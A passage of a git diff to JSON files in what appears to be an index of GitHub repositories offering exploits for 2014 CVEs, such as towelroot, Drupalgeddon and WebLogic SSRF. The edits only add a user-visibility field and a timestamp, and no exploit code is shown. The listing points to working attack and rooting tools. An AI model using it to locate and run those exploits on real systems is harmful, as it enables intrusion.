b/2014/CVE-2014-1773.json @@ -7,7 +7,8 @@ "login": "day6reak", "id": 1537207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1537207?v=4", - "html_url": "https:\/\/github.com\/day6reak" + "html_url": "https:\/\/github.com\/day6reak", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/day6reak\/CVE-2014-1773", "description": null, diff --git a/2014/CVE-2014-1812.json b/2014/CVE-2014-1812.json index ddf8a791d5..acd424f1b0 100644 --- a/2014/CVE-2014-1812.json +++ b/2014/CVE-2014-1812.json @@ -7,7 +7,8 @@ "login": "mauricelambert", "id": 50479118, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", - "html_url": "https:\/\/github.com\/mauricelambert" + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mauricelambert\/gpp-encrypt", "description": "This little script encrypts password to gpp cpassword. It useful to create vulnerable lab AD (CVE-2014-1812).", diff --git a/2014/CVE-2014-2064.json b/2014/CVE-2014-2064.json index 97a24b371e..13c42139be 100644 --- a/2014/CVE-2014-2064.json +++ b/2014/CVE-2014-2064.json @@ -7,7 +7,8 @@ "login": "Naramsim", "id": 8996268, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8996268?v=4", - "html_url": "https:\/\/github.com\/Naramsim" + "html_url": "https:\/\/github.com\/Naramsim", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Naramsim\/Offensive", "description": "Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904", diff --git a/2014/CVE-2014-2321.json b/2014/CVE-2014-2321.json index 583e3fc246..db2371dc66 100644 --- a/2014/CVE-2014-2321.json +++ b/2014/CVE-2014-2321.json @@ -7,7 +7,8 @@ "login": "injectionmethod", "id": 80434330, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80434330?v=4", - "html_url": "https:\/\/github.com\/injectionmethod" + "html_url": "https:\/\/github.com\/injectionmethod", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/injectionmethod\/ZTE-Vuln-4-Skids", "description": "Archive: Exploit https:\/\/www.cvedetails.com\/cve\/CVE-2014-2321\/ For CentOS", @@ -45,7 +46,8 @@ "login": "injectionmethod", "id": 80434330, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80434330?v=4", - "html_url": "https:\/\/github.com\/injectionmethod" + "html_url": "https:\/\/github.com\/injectionmethod", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/injectionmethod\/Windows-ZTE-Loader", "description": "Windows ZTE Loader CVE-2014-2321 Requires ZMAP For Windows Or BigEar", diff --git a/2014/CVE-2014-2323.json b/2014/CVE-2014-2323.json index 3679656d60..16fdaf178b 100644 --- a/2014/CVE-2014-2323.json +++ b/2014/CVE-2014-2323.json @@ -7,7 +7,8 @@ "login": "cirocosta", "id": 3574444, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3574444?v=4", - "html_url": "https:\/\/github.com\/cirocosta" + "html_url": "https:\/\/github.com\/cirocosta", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cirocosta\/lighty-sqlinj-demo", "description": "CVE-2014-2323 exploit demonstration", diff --git a/2014/CVE-2014-2324.json b/2014/CVE-2014-2324.json index 7c461a3c04..a86ae35ced 100644 --- a/2014/CVE-2014-2324.json +++ b/2014/CVE-2014-2324.json @@ -7,7 +7,8 @@ "login": "sp4c30x1", "id": 33990446, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33990446?v=4", - "html_url": "https:\/\/github.com\/sp4c30x1" + "html_url": "https:\/\/github.com\/sp4c30x1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sp4c30x1\/uc_httpd_exploit", "description": "Simple uc httpd exploit made with py3.. this exploit was written from CVE-2014-2324", diff --git a/2014/CVE-2014-2383.json b/2014/CVE-2014-2383.json index 647950daa2..f5443647d0 100644 --- a/2014/CVE-2014-2383.json +++ b/2014/CVE-2014-2383.json @@ -7,7 +7,8 @@ "login": "Relativ3Pa1n", "id": 87828878, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87828878?v=4", - "html_url": "https:\/\/github.com\/Relativ3Pa1n" + "html_url": "https:\/\/github.com\/Relativ3Pa1n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Relativ3Pa1n\/CVE-2014-2383-LFI-to-RCE-Escalation", "description": null, diff --git a/2014/CVE-2014-2630.json b/2014/CVE-2014-2630.json index 87a80304fa..6490459c81 100644 --- a/2014/CVE-2014-2630.json +++ b/2014/CVE-2014-2630.json @@ -7,7 +7,8 @@ "login": "redtimmy", "id": 40774163, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40774163?v=4", - "html_url": "https:\/\/github.com\/redtimmy" + "html_url": "https:\/\/github.com\/redtimmy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/redtimmy\/perf-exploiter", "description": "CVE-2014-2630 exploit for xglance-bin ", diff --git a/2014/CVE-2014-2734.json b/2014/CVE-2014-2734.json index 06170afaf3..10d7f0b8ea 100644 --- a/2014/CVE-2014-2734.json +++ b/2014/CVE-2014-2734.json @@ -7,7 +7,8 @@ "login": "gdisneyleugers", "id": 4960012, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4960012?v=4", - "html_url": "https:\/\/github.com\/gdisneyleugers" + "html_url": "https:\/\/github.com\/gdisneyleugers", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gdisneyleugers\/CVE-2014-2734", "description": "Ruby OpenSSL CA Private Key Spoofing", @@ -37,7 +38,8 @@ "login": "adrienthebo", "id": 172194, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172194?v=4", - "html_url": "https:\/\/github.com\/adrienthebo" + "html_url": "https:\/\/github.com\/adrienthebo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adrienthebo\/cve-2014-2734", "description": "I think this CVE is full of lies and deceit and very confusing code.", diff --git a/2014/CVE-2014-2815.json b/2014/CVE-2014-2815.json index aa1a44769c..4d0d41c489 100644 --- a/2014/CVE-2014-2815.json +++ b/2014/CVE-2014-2815.json @@ -7,7 +7,8 @@ "login": "Edubr2020", "id": 60452468, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452468?v=4", - "html_url": "https:\/\/github.com\/Edubr2020" + "html_url": "https:\/\/github.com\/Edubr2020", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Edubr2020\/CABTrap_OneNote2007", "description": "Microsoft Office Onenote 2007 (CVE-2014-2815) \".ONEPKG\" File Directory Traversal Vulnerability Leads to Arbitrary Code Execution", diff --git a/2014/CVE-2014-3120.json b/2014/CVE-2014-3120.json index 442e1a66fd..a74acf62e5 100644 --- a/2014/CVE-2014-3120.json +++ b/2014/CVE-2014-3120.json @@ -7,7 +7,8 @@ "login": "jeffgeiger", "id": 1312480, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1312480?v=4", - "html_url": "https:\/\/github.com\/jeffgeiger" + "html_url": "https:\/\/github.com\/jeffgeiger", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jeffgeiger\/es_inject", "description": "Demonstration of CVE-2014-3120", @@ -37,7 +38,8 @@ "login": "echohtp", "id": 313060, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/313060?v=4", - "html_url": "https:\/\/github.com\/echohtp" + "html_url": "https:\/\/github.com\/echohtp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/echohtp\/ElasticSearch-CVE-2014-3120", "description": "POC Code to exploite CVE-2014-3120", @@ -67,7 +69,8 @@ "login": "xpgdgit", "id": 30492998, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30492998?v=4", - "html_url": "https:\/\/github.com\/xpgdgit" + "html_url": "https:\/\/github.com\/xpgdgit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xpgdgit\/CVE-2014-3120", "description": null, diff --git a/2014/CVE-2014-3153.json b/2014/CVE-2014-3153.json index a3f2f8074d..79b66173f0 100644 --- a/2014/CVE-2014-3153.json +++ b/2014/CVE-2014-3153.json @@ -7,7 +7,8 @@ "login": "timwr", "id": 684924, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684924?v=4", - "html_url": "https:\/\/github.com\/timwr" + "html_url": "https:\/\/github.com\/timwr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timwr\/CVE-2014-3153", "description": "CVE-2014-3153 aka towelroot", @@ -37,7 +38,8 @@ "login": "android-rooting-tools", "id": 4747069, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4747069?v=4", - "html_url": "https:\/\/github.com\/android-rooting-tools" + "html_url": "https:\/\/github.com\/android-rooting-tools", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/android-rooting-tools\/libfutex_exploit", "description": "CVE-2014-3153 exploit", @@ -67,7 +69,8 @@ "login": "geekben", "id": 6094550, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6094550?v=4", - "html_url": "https:\/\/github.com\/geekben" + "html_url": "https:\/\/github.com\/geekben", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/geekben\/towelroot", "description": "Research of CVE-2014-3153 and its famous exploit towelroot on x86", @@ -97,7 +100,8 @@ "login": "lieanu", "id": 3104641, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3104641?v=4", - "html_url": "https:\/\/github.com\/lieanu" + "html_url": "https:\/\/github.com\/lieanu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lieanu\/CVE-2014-3153", "description": "cve2014-3153 exploit for ubuntu x86", @@ -127,7 +131,8 @@ "login": "zerodavinci", "id": 4964771, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4964771?v=4", - "html_url": "https:\/\/github.com\/zerodavinci" + "html_url": "https:\/\/github.com\/zerodavinci", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zerodavinci\/CVE-2014-3153-exploit", "description": "My exploit for kernel exploitation", @@ -157,7 +162,8 @@ "login": "c3c", "id": 2326945, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2326945?v=4", - "html_url": "https:\/\/github.com\/c3c" + "html_url": "https:\/\/github.com\/c3c", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c3c\/CVE-2014-3153", "description": "towelroot", @@ -187,13 +193,14 @@ "login": "dangtunguyen", "id": 25807559, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25807559?v=4", - "html_url": "https:\/\/github.com\/dangtunguyen" + "html_url": "https:\/\/github.com\/dangtunguyen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dangtunguyen\/TowelRoot", "description": "Gain root privilege by exploiting CVE-2014-3153 vulnerability", "fork": false, "created_at": "2018-09-27T03:16:15Z", - "updated_at": "2024-06-03T08:24:05Z", + "updated_at": "2024-10-17T22:57:16Z", "pushed_at": "2018-09-27T03:31:02Z", "stargazers_count": 12, "watchers_count": 12, @@ -220,7 +227,8 @@ "login": "elongl", "id": 30181361, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30181361?v=4", - "html_url": "https:\/\/github.com\/elongl" + "html_url": "https:\/\/github.com\/elongl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/elongl\/CVE-2014-3153", "description": "Exploiting CVE-2014-3153, AKA Towelroot.", @@ -257,7 +265,8 @@ "login": "c4mx", "id": 16646683, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16646683?v=4", - "html_url": "https:\/\/github.com\/c4mx" + "html_url": "https:\/\/github.com\/c4mx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c4mx\/Linux-kernel-code-injection_CVE-2014-3153", "description": "Study on Linux kernel code injection via CVE-2014-3153 (Towelroot)", diff --git a/2014/CVE-2014-3341.json b/2014/CVE-2014-3341.json index fda9f5bd7b..3e8fcb1948 100644 --- a/2014/CVE-2014-3341.json +++ b/2014/CVE-2014-3341.json @@ -7,7 +7,8 @@ "login": "ehabhussein", "id": 5464055, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5464055?v=4", - "html_url": "https:\/\/github.com\/ehabhussein" + "html_url": "https:\/\/github.com\/ehabhussein", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ehabhussein\/snmpvlan", "description": "CVE-2014-3341 exploit", diff --git a/2014/CVE-2014-3466.json b/2014/CVE-2014-3466.json index 1da331399d..3c36fa37d5 100644 --- a/2014/CVE-2014-3466.json +++ b/2014/CVE-2014-3466.json @@ -7,7 +7,8 @@ "login": "azet", "id": 855369, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/855369?v=4", - "html_url": "https:\/\/github.com\/azet" + "html_url": "https:\/\/github.com\/azet", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/azet\/CVE-2014-3466_PoC", "description": "Proof of Concept for CVE-2014-3466 (GnuTLS buffer overflow: session id length check)", diff --git a/2014/CVE-2014-3507.json b/2014/CVE-2014-3507.json index b9a6c95c03..54d2eb7e2b 100644 --- a/2014/CVE-2014-3507.json +++ b/2014/CVE-2014-3507.json @@ -7,7 +7,8 @@ "login": "Satheesh575555", "id": 102573923, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", - "html_url": "https:\/\/github.com\/Satheesh575555" + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Satheesh575555\/openSSL_1.0.1g_CVE-2014-3507", "description": null, diff --git a/2014/CVE-2014-3544.json b/2014/CVE-2014-3544.json index 29416fdd04..7a0184d305 100644 --- a/2014/CVE-2014-3544.json +++ b/2014/CVE-2014-3544.json @@ -7,7 +7,8 @@ "login": "aforesaid", "id": 66903760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66903760?v=4", - "html_url": "https:\/\/github.com\/aforesaid" + "html_url": "https:\/\/github.com\/aforesaid", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/aforesaid\/MoodleHack", "description": "Реализация использования уязвимости Moodle CVE-2014-3544.", diff --git a/2014/CVE-2014-3551.json b/2014/CVE-2014-3551.json index 0d8830df86..09178fa904 100644 --- a/2014/CVE-2014-3551.json +++ b/2014/CVE-2014-3551.json @@ -7,7 +7,8 @@ "login": "JavaGarcia", "id": 5332084, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5332084?v=4", - "html_url": "https:\/\/github.com\/JavaGarcia" + "html_url": "https:\/\/github.com\/JavaGarcia", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JavaGarcia\/CVE-2014-3551", "description": "CVE-2014-3551", diff --git a/2014/CVE-2014-3566.json b/2014/CVE-2014-3566.json index a6abac96ac..556fc3468e 100644 --- a/2014/CVE-2014-3566.json +++ b/2014/CVE-2014-3566.json @@ -7,7 +7,8 @@ "login": "mikesplain", "id": 881965, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/881965?v=4", - "html_url": "https:\/\/github.com\/mikesplain" + "html_url": "https:\/\/github.com\/mikesplain", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mikesplain\/CVE-2014-3566-poodle-cookbook", "description": null, @@ -37,7 +38,8 @@ "login": "stdevel", "id": 5862725, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5862725?v=4", - "html_url": "https:\/\/github.com\/stdevel" + "html_url": "https:\/\/github.com\/stdevel", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stdevel\/poodle_protector", "description": "Python script for automatically protecting your systems against POODLE vulnerability (CVE-2014-3566)", @@ -71,7 +73,8 @@ "login": "cloudpassage", "id": 871428, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/871428?v=4", - "html_url": "https:\/\/github.com\/cloudpassage" + "html_url": "https:\/\/github.com\/cloudpassage", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cloudpassage\/mangy-beast", "description": "CloudPassage Halo policy for detecting vulnerability to CVE-2014-3566 (AKA POODLE)", @@ -101,7 +104,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/poodle-PoC", "description": ":poodle: Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 :poodle:", @@ -139,7 +143,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/openssl_g2.5_CVE-2014-3566", "description": null, diff --git a/2014/CVE-2014-3570.json b/2014/CVE-2014-3570.json index 8485498ec2..d0468fd2c2 100644 --- a/2014/CVE-2014-3570.json +++ b/2014/CVE-2014-3570.json @@ -7,7 +7,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/openssl_G2.5_CVE-2014-3570", "description": null, @@ -37,7 +38,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/Openssl_G2.5_CVE-2014-3570_01", "description": null, @@ -67,7 +69,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-3570", "description": null, @@ -97,7 +100,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-3570_G2.5_openssl_no_patch", "description": null, diff --git a/2014/CVE-2014-3625.json b/2014/CVE-2014-3625.json index 6cc1f10d84..39bf4fb117 100644 --- a/2014/CVE-2014-3625.json +++ b/2014/CVE-2014-3625.json @@ -7,7 +7,8 @@ "login": "ilmila", "id": 2845952, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2845952?v=4", - "html_url": "https:\/\/github.com\/ilmila" + "html_url": "https:\/\/github.com\/ilmila", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ilmila\/springcss-cve-2014-3625", "description": "spring mvc cve-2014-3625", @@ -37,7 +38,8 @@ "login": "gforresu", "id": 6943421, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6943421?v=4", - "html_url": "https:\/\/github.com\/gforresu" + "html_url": "https:\/\/github.com\/gforresu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gforresu\/SpringPathTraversal", "description": "String MVC Framework Path-Traversal proof of concept. CVE-2014-3625 ", diff --git a/2014/CVE-2014-3704.json b/2014/CVE-2014-3704.json index 96dcc74121..8e270dbfd8 100644 --- a/2014/CVE-2014-3704.json +++ b/2014/CVE-2014-3704.json @@ -7,7 +7,8 @@ "login": "happynote3966", "id": 19719330, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19719330?v=4", - "html_url": "https:\/\/github.com\/happynote3966" + "html_url": "https:\/\/github.com\/happynote3966", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/happynote3966\/CVE-2014-3704", "description": null, @@ -37,7 +38,8 @@ "login": "AleDiBen", "id": 18688115, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18688115?v=4", - "html_url": "https:\/\/github.com\/AleDiBen" + "html_url": "https:\/\/github.com\/AleDiBen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AleDiBen\/Drupalgeddon", "description": "CVE-2014-3704 aka Drupalgeddon - Form-Cache Injection Method", diff --git a/2014/CVE-2014-4014.json b/2014/CVE-2014-4014.json index 38fb9b9841..7ce553bdd8 100644 --- a/2014/CVE-2014-4014.json +++ b/2014/CVE-2014-4014.json @@ -7,7 +7,8 @@ "login": "vnik5287", "id": 9650718, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", - "html_url": "https:\/\/github.com\/vnik5287" + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vnik5287\/cve-2014-4014-privesc", "description": "cve-2014-4014", diff --git a/2014/CVE-2014-4076.json b/2014/CVE-2014-4076.json index 0260ea2486..9b867d9d8e 100644 --- a/2014/CVE-2014-4076.json +++ b/2014/CVE-2014-4076.json @@ -7,7 +7,8 @@ "login": "fungoshacks", "id": 13205789, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13205789?v=4", - "html_url": "https:\/\/github.com\/fungoshacks" + "html_url": "https:\/\/github.com\/fungoshacks", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fungoshacks\/CVE-2014-4076", "description": "Windows 2k3 tcpip.sys Privilege Escalation", diff --git a/2014/CVE-2014-4109.json b/2014/CVE-2014-4109.json index 09936a54d1..7809d2d8d0 100644 --- a/2014/CVE-2014-4109.json +++ b/2014/CVE-2014-4109.json @@ -7,7 +7,8 @@ "login": "day6reak", "id": 1537207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1537207?v=4", - "html_url": "https:\/\/github.com\/day6reak" + "html_url": "https:\/\/github.com\/day6reak", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/day6reak\/CVE-2014-4109", "description": null, diff --git a/2014/CVE-2014-4113.json b/2014/CVE-2014-4113.json index 0e24c21ce8..11a4df885d 100644 --- a/2014/CVE-2014-4113.json +++ b/2014/CVE-2014-4113.json @@ -7,7 +7,8 @@ "login": "johnjohnsp1", "id": 1888855, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1888855?v=4", - "html_url": "https:\/\/github.com\/johnjohnsp1" + "html_url": "https:\/\/github.com\/johnjohnsp1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/johnjohnsp1\/CVE-2014-4113", "description": "PowerShell CVE-2014-4113", @@ -37,7 +38,8 @@ "login": "nsxz", "id": 8149728, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8149728?v=4", - "html_url": "https:\/\/github.com\/nsxz" + "html_url": "https:\/\/github.com\/nsxz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nsxz\/Exploit-CVE-2014-4113", "description": "Exploit CVE-2014-4113", @@ -67,7 +69,8 @@ "login": "sam-b", "id": 997395, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/997395?v=4", - "html_url": "https:\/\/github.com\/sam-b" + "html_url": "https:\/\/github.com\/sam-b", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sam-b\/CVE-2014-4113", "description": "Trigger and exploit code for CVE-2014-4113", @@ -97,7 +100,8 @@ "login": "wikiZ", "id": 37897216, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37897216?v=4", - "html_url": "https:\/\/github.com\/wikiZ" + "html_url": "https:\/\/github.com\/wikiZ", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wikiZ\/cve-2014-4113", "description": null, diff --git a/2014/CVE-2014-4140.json b/2014/CVE-2014-4140.json index 98deb4dfcf..20ba219de2 100644 --- a/2014/CVE-2014-4140.json +++ b/2014/CVE-2014-4140.json @@ -7,7 +7,8 @@ "login": "day6reak", "id": 1537207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1537207?v=4", - "html_url": "https:\/\/github.com\/day6reak" + "html_url": "https:\/\/github.com\/day6reak", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/day6reak\/CVE-2014-4140", "description": null, diff --git a/2014/CVE-2014-4210.json b/2014/CVE-2014-4210.json index 6ff5ca7e2c..774a427157 100644 --- a/2014/CVE-2014-4210.json +++ b/2014/CVE-2014-4210.json @@ -7,7 +7,8 @@ "login": "NoneNotNull", "id": 13295780, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13295780?v=4", - "html_url": "https:\/\/github.com\/NoneNotNull" + "html_url": "https:\/\/github.com\/NoneNotNull", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NoneNotNull\/SSRFX", "description": "CVE-2014-4210+Redis未授权访问", @@ -37,7 +38,8 @@ "login": "0xn0ne", "id": 16507416, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16507416?v=4", - "html_url": "https:\/\/github.com\/0xn0ne" + "html_url": "https:\/\/github.com\/0xn0ne", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xn0ne\/weblogicScanner", "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", @@ -88,7 +90,8 @@ "login": "unmanarc", "id": 7947734, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7947734?v=4", - "html_url": "https:\/\/github.com\/unmanarc" + "html_url": "https:\/\/github.com\/unmanarc", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/unmanarc\/CVE-2014-4210-SSRF-PORTSCANNER-POC", "description": "CVE-2014-4210 SSRF PORTSCANNER PoC", @@ -118,7 +121,8 @@ "login": "NHPT", "id": 42366434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", - "html_url": "https:\/\/github.com\/NHPT" + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NHPT\/WebLogic-SSRF_CVE-2014-4210", "description": "Weblogic SearchPublicRegistries SSRF(CVE-2014-4210) Exploit Script based on Python3", diff --git a/2014/CVE-2014-4321.json b/2014/CVE-2014-4321.json index 932eccf996..6071318188 100644 --- a/2014/CVE-2014-4321.json +++ b/2014/CVE-2014-4321.json @@ -7,7 +7,8 @@ "login": "android-rooting-tools", "id": 4747069, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4747069?v=4", - "html_url": "https:\/\/github.com\/android-rooting-tools" + "html_url": "https:\/\/github.com\/android-rooting-tools", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/android-rooting-tools\/libmsm_vfe_read_exploit", "description": "CVE-2014-4321 exploit", diff --git a/2014/CVE-2014-4322.json b/2014/CVE-2014-4322.json index 1a7631101f..7d854064e9 100644 --- a/2014/CVE-2014-4322.json +++ b/2014/CVE-2014-4322.json @@ -7,7 +7,8 @@ "login": "retme7", "id": 5284280, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5284280?v=4", - "html_url": "https:\/\/github.com\/retme7" + "html_url": "https:\/\/github.com\/retme7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/retme7\/CVE-2014-4322_poc", "description": "Gain privileges:system -> root,as a part of https:\/\/github.com\/retme7\/CVE-2014-7911_poc", @@ -37,7 +38,8 @@ "login": "laginimaineb", "id": 11378334, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11378334?v=4", - "html_url": "https:\/\/github.com\/laginimaineb" + "html_url": "https:\/\/github.com\/laginimaineb", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/laginimaineb\/cve-2014-4322", "description": "CVE-2014-4322 Exploit", @@ -67,7 +69,8 @@ "login": "askk", "id": 4988461, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4988461?v=4", - "html_url": "https:\/\/github.com\/askk" + "html_url": "https:\/\/github.com\/askk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/askk\/CVE-2014-4322_adaptation", "description": "Just an attempt to adapt for Note 4, I do not know what I am doing.", @@ -97,7 +100,8 @@ "login": "koozxcv", "id": 15362158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15362158?v=4", - "html_url": "https:\/\/github.com\/koozxcv" + "html_url": "https:\/\/github.com\/koozxcv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/koozxcv\/CVE-2014-4322", "description": "must run this native binary with system privilege", diff --git a/2014/CVE-2014-4323.json b/2014/CVE-2014-4323.json index dd2ae8ded3..10449ea56e 100644 --- a/2014/CVE-2014-4323.json +++ b/2014/CVE-2014-4323.json @@ -7,7 +7,8 @@ "login": "marcograss", "id": 1010159, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1010159?v=4", - "html_url": "https:\/\/github.com\/marcograss" + "html_url": "https:\/\/github.com\/marcograss", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marcograss\/cve-2014-4323", "description": "cve-2014-4323 poc", diff --git a/2014/CVE-2014-4377.json b/2014/CVE-2014-4377.json index 7116067d3f..aa59a9acae 100644 --- a/2014/CVE-2014-4377.json +++ b/2014/CVE-2014-4377.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2014-4377", "description": null, @@ -37,7 